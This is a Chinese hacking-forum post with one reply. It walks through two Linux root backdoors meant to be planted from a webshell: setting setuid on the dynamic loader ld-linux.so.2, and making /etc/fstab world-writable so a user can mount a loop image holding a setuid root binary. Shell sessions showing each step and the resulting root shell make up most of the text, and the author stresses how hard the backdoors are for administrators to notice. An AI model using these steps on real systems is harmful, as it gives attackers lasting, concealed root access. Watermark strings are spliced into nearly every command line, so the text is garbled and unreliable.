中国网络渗透测试联盟

标题: webshell下LINUX提权+留后门 [打印本页]
作者: admin    时间: 2013-3-8 21:56
标题: webshell下LINUX提权+留后门
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究$ \8 N* i9 n+ N
$ s8 W( X$ @" F* i
[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究
, B5 B. \& u1 Q/ |* slrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究: z7 s( X( }9 {
lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
) f0 \( U. N( L, I% B( S1 Q+ }[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
. Y5 S# m% `3 l6 a[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究! P* \! d6 ~. }. ]* A* C
-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
' z& {. ]! c5 o. y% D( c, }lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究8 Q( m. u$ [  \, @
[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究
7 j& |1 a8 d, Q% k我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究
0 y, r" N1 }& B5 R3 g2 M) U$ p& F( E& ]3 [+ F* ^" M
普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究. h* a& O/ e* B. M; L

/ w! V. _* I+ p) {. ^% H0 D[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究
; [7 U" Q0 k6 j7 q8 V9 y  N. B( vxiaoyu2ezX-BUG-关注前沿信息安全技术研究
8 H' X' j* `) J" F5 g' q% I* e[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究8 K; Y: v, F' o; x3 U
root2ezX-BUG-关注前沿信息安全技术研究
5 ?; T/ q* e* U+ m- T& d6 z" j, `[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究
/ @" c& I1 @3 q恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究
/ B2 @* `; G( p$ e: O/ k$ Z& J+ q5 _1 d5 N
方法二:2ezX-BUG-关注前沿信息安全技术研究, ?" v0 m/ R" v( I% _
/ q# E- i+ V. n* j/ F! m4 l
看过程:2ezX-BUG-关注前沿信息安全技术研究
: [- W0 i- V2 N) i2 |0 e8 t% n
8 G! t; R9 b* }. u) Q) w# u[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究+ X, B; Y( M- m2 f
[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究/ j# F  z' [5 h( p0 L# ^3 {. k/ r

4 T& b: S3 S# \/ E3 f  o这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究
8 ~  I$ S4 w5 F9 @+ I+ B& l1 V  k; X- O
- W. a3 @& P" M5 t+ b/ ~3 l4 z[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
( C8 |& N) i; V9 U& x2 c- X-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究; |, Y" F0 e* U  V: m4 }
[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
2 n' \8 a8 Z: A. f$ M3 s
  H4 |. i) u% t5 y  _8 n9 b然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究
& @! W7 I# D) ]4 s1 _# Z5 X. `5 L( i* U6 I: i7 J! i4 b
[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究
0 J  |, `9 @7 e- A: w- Y$ R-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究
. b* @% W( T% \; E) |) l2 M[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究
# w, I" v5 J8 H; \[xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究5 t8 d6 O+ y) W5 M% P( r+ ~8 |
[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究
9 O7 n# D$ h7 V1 l# ~total 182ezX-BUG-关注前沿信息安全技术研究
* }1 T3 `; B) u6 C8 n7 F  C' U9 ]drwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究/ Y. m3 w, v5 [/ f- K" }7 ]6 E
-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究; k( }; I" w8 ?0 g' ^/ ~
[xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究  |. J2 O+ P8 O/ b: ?' b# {( w1 O" j
sh-3.2#2ezX-BUG-关注前沿信息安全技术研究
; {3 x8 _7 I9 s# _看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究
$ T# X/ Q) Y/ `, c' ~+ Ftest这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究+ q6 c# n4 z# |. V& n# n- n6 U5 G; T- |
& E% m# I* k& {
貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究# E. f2 S! _: Q! J1 t: f
2ezX-BUG-关注前沿信息安全技术研究
/ `( E4 D" C, D) v! e
$ i5 y1 A# O, w6 q. r
作者: wuyu    时间: 2013-3-13 15:10
谢谢分享



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2